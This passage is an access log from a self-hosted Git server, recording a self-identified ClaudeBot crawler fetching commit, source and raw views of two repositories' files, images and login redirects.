-[15/Feb/2026:14:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup" [Client 216.73.216.188] [Length 9854] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal" [Client 216.73.216.188] [Length 9925] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" [Client 216.73.216.188] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site" [Client 216.73.216.188] [Length 9926] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 216.73.216.188] [Length 12174] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 216.73.216.188] [Length 13536] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fnpm%2Fdata%2Flogs" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2Fdata%2Flogs%2Fproxy-host-1_access.log" [Client 216.73.216.188] [Length 17990] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 216.73.216.188] [Length 11560] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fupdate_status.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore?display=source" [Client 216.73.216.188] [Length 10984] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2Fdata%2Flogs%2Fproxy-host-4_access.log" [Client 216.73.216.188] [Length 19606] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" [Client 216.73.216.188] [Length 10202] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx?display=source" [Client 216.73.216.188] [Length 14258] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 216.73.216.188] [Length 11553] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx?display=source" [Client 216.73.216.188] [Length 13924] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 90048] [Gzip 12.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip?display=source" [Client 216.73.216.188] [Length 11561] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx?display=rendered" [Client 216.73.216.188] [Length 10945] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 216.73.216.188] [Length 19902] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fpages%2FDCS.html" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 216.73.216.188] [Length 10995] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fpages%2FDCS.html" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt.log.3" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" [Client 216.73.216.188] [Length 9910] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" [Client 216.73.216.188] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt.log" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" [Client 216.73.216.188] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 10893] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets%2Fimages%2FControlRoom1.png" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets%2Fimages%2FControlRoom6.png" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr 